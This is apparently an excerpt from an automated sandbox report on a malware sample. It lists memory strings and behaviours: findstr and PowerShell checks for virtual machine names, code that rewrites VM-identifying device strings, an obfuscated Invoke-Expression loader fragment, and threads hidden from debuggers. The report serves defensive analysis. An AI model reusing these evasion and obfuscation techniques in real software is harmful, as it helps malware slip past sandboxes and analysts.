Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570D894 FindFirstFileExW,	47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	47_2_000001EF0570DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000035.00000002.2582402751.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000030.00000002.2582876594.000002287A02B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: cmd.exe, 00000014.00000003.1681248297.000002527D8A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.2643052755.000002A76AF0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: cmd.exe, 00000014.00000003.1690532569.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689954299.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690299922.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690649623.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1681785940.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689333508.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689704060.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691446587.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691192247.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000035.00000000.2147943830.000002A76A49A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2644921249.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr	Binary or memory string: VMware
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys`
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2i
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2i
Source: cmd.exe, 00000014.00000003.1689147835.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689227342.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682292513.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys`
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys`
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: svchost.exe, 00000035.00000000.2162013238.000002A76C164000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 0000002B.00000000.2078420703.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2573453748.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2086260407.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2097554251.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2563222103.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2584284217.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2102410747.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2117344700.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2562685157.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2580922407.000002A769A2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZueKdEUUHiAXSCEDQYywxUjqjircvINglhjoFgCxNsHvopanXhowrjTfkOBVnSyZuuLKtpYKwb=tALLUSERSPROFILE=C:\ProgramDataanDsspKbaAOnvXJVRvGTkogjNLOjOiH=e('blck', '');APPDATA=C:\Users\user\AppData\RoamingatmPoAjKkGZcJzXyyUynWvzDHvk=ty.CryptographaUGORSbYAjGEewLJLAkjASOdO=ct blckSblckybaUMtCDXIBRyZfMXCSGPuCVEiFWmumVX=on qVeuI($eXEDAuUOsIvFTJiTqAZpvwNE=y.PaddingMode]AWVLTAfgiDypHXCDErXpLpMtvtCO=blckib
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys`
Source: svchost.exe, 00000031.00000000.2117097116.000001B94D400000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Source: C:\Windows\System32\cmd.exe

Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

20_2_000002527DEECD80

Source: C:\Windows\System32\cmd.exe

Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx,

20_2_000002527DEE1E3C

Source: C:\Windows\System32\cmd.exe

Code function: 20_2_000002527DEE11D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

20_2_000002527DEE11D4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002527DEE84B0
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002527DEE8814
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002527DF1CD80
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002527DF184B0
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002527DF18814
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00000286D7D1CD80
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00000286D7D184B0
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00000286D7D18814
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001D54783CD80
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D5478384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001D5478384B0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D547838814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_000001D547838814
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001EF0922CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF09228814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000001EF09228814
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF092284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001EF092284B0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001EF0942CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF09428814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000001EF09428814
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF094284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001EF094284B0
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001CA7D21CD80
